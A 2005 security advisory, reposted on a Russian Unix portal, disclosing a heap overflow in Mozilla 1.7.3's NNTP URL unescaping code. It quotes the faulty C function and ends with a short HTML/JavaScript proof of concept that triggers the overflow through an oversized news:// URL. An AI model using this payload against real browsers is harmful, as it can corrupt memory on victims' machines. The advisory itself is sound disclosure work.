The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] Mozilla Browser NNTP Heap Overflow


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 2 Jan 2005 17:06:08 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Subject: [UNIX] Mozilla Browser NNTP Heap Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Mozilla Browser NNTP Heap Overflow
------------------------------------------------------------------------


SUMMARY

A critical security vulnerability has been found in Mozilla Project code 
handling NNTP protocol.

DETAILS

Vulnerable Systems:
 * Mozilla Browser version 1.7.3 and prior with mozilla-mail

Immune Systems:
 * Mozilla Browser version 1.7.5 or newer

Mozilla browser supports NNTP URLs. Remote side is able to trigger  
news:// connection to any server. Maurycy found a flaw in NNTP handling 
code which may cause heap overflow and allow remote attacker to execute 
arbitrary code on client machine.

Bugus function from nsNNTPProtocol.cpp:
char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
329 {
330   char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) + 
1);
331   if (result)
332   {
333     char *resultPtr = result;
334     while (1)
335     {
336       char ch = *commandSpecificData++;
337       if (!ch)
338         break;
339       if (ch == '\\')
340       {
341         char scratchBuf[3];
342         scratchBuf[0] = (char) *commandSpecificData++;
343         scratchBuf[1] = (char) *commandSpecificData++;
344         scratchBuf[2] = '\0';
345         int accum = 0;
346         PR_sscanf(scratchBuf, "%X", &accum);
347         *resultPtr++ = (char) accum;
348       }
349       else
350         *resultPtr++ = ch;
351     }
352     *resultPtr = '\0';
353   }
354   return result;
355 }

When commandSpecificData points to last (next is NULL) character which is 
'\\' copying loop may omit termination of source char array and overflow 
result buffer.

Solution:
This bug is fixed in Mozilla 1.7.5. (Bug 264388) Mozilla developer Dan 
Veditz claims that it cannot be exploitable: "A '\' on the end will 
certainly trash memory, but at that point you're no longer reading 
attacker-supplied data;".

On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code 
overflows the buffer using attacker-supplied data. I decided to make this 
bug public because Mozilla Team hasn't warned users.

Proof of concept:
< html>
< script>
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
  i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
  i=i+"A";
i=i+"\\";
window.open(i);
</script>
</html>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:z33d@isec.pl.> Maurycy 
Prodeus.
The original article can be found at:  
<http://isec.pl/vulnerabilities/isec-0020-mozilla.txt>; 
http://isec.pl/vulnerabilities/isec-0020-mozilla.txt




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру